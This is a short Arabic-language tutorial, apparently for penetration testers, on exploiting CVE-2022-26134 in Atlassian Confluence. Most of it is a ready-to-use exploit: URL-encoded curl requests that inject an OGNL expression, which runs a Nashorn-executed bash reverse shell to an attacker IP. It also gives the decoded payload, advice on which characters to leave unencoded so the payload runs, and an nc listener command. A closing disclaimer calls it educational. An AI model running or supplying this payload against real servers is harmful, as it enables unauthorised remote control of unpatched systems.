
استغلال نشط لـ Atlassian’s Questions for Confluence App CVE-2022-26134
CVE-2022-26134 هي ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) خطيرة تؤثر في Atlassian Confluence. تسمح هذه الثغرة للمهاجمين غير المصادق عليهم بتنفيذ تعليمات برمجية عشوائية عن طريق حقن تعبيرات OGNL في نقاط النهاية الضعيفة.
يُظهر أمر CURL التالي الاستغلال النشط لهذه الثغرة، باستخدام محرك Nashorn لجافا لتنفيذ شل عكسي:
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
أثناء إجراء هذه التعديلات، نحتاج أيضًا إلى مراعاة ترميز URL. سلسلة الحمولة في إثبات المفهوم ليست مشفرة بالكامل بترميز URL. بعض الأحرف (خاصة ".", "-" و "/") غير مشفرة. على الرغم من أن الأمر ليس كذلك دائمًا، إلا أن هذا يثبت أنه مهم لتشغيل الحمولة في هذا الاستغلال. إذا تم ترميز أي من هذه الأحرف، فسيقوم الخادم بتحليل URL بشكل مختلف، وقد لا يتم تنفيذ الحمولة. هذا يعني أنه لا يمكننا تطبيق ترميز URL على الحمولة بأكملها بمجرد تعديلها.
curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.118.4/4444%200%3E%261%27%29.start%28%29%22%29%7D/
${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
nc -lvnp 1270
هذه الوثائق هي لأغراض تعليمية فقط. الاستغلال غير المصرح به للأنظمة غير قانوني وقد يؤدي إلى عواقب وخيمة. احصل دائمًا على التصريح المناسب قبل إجراء تقييمات الأمان.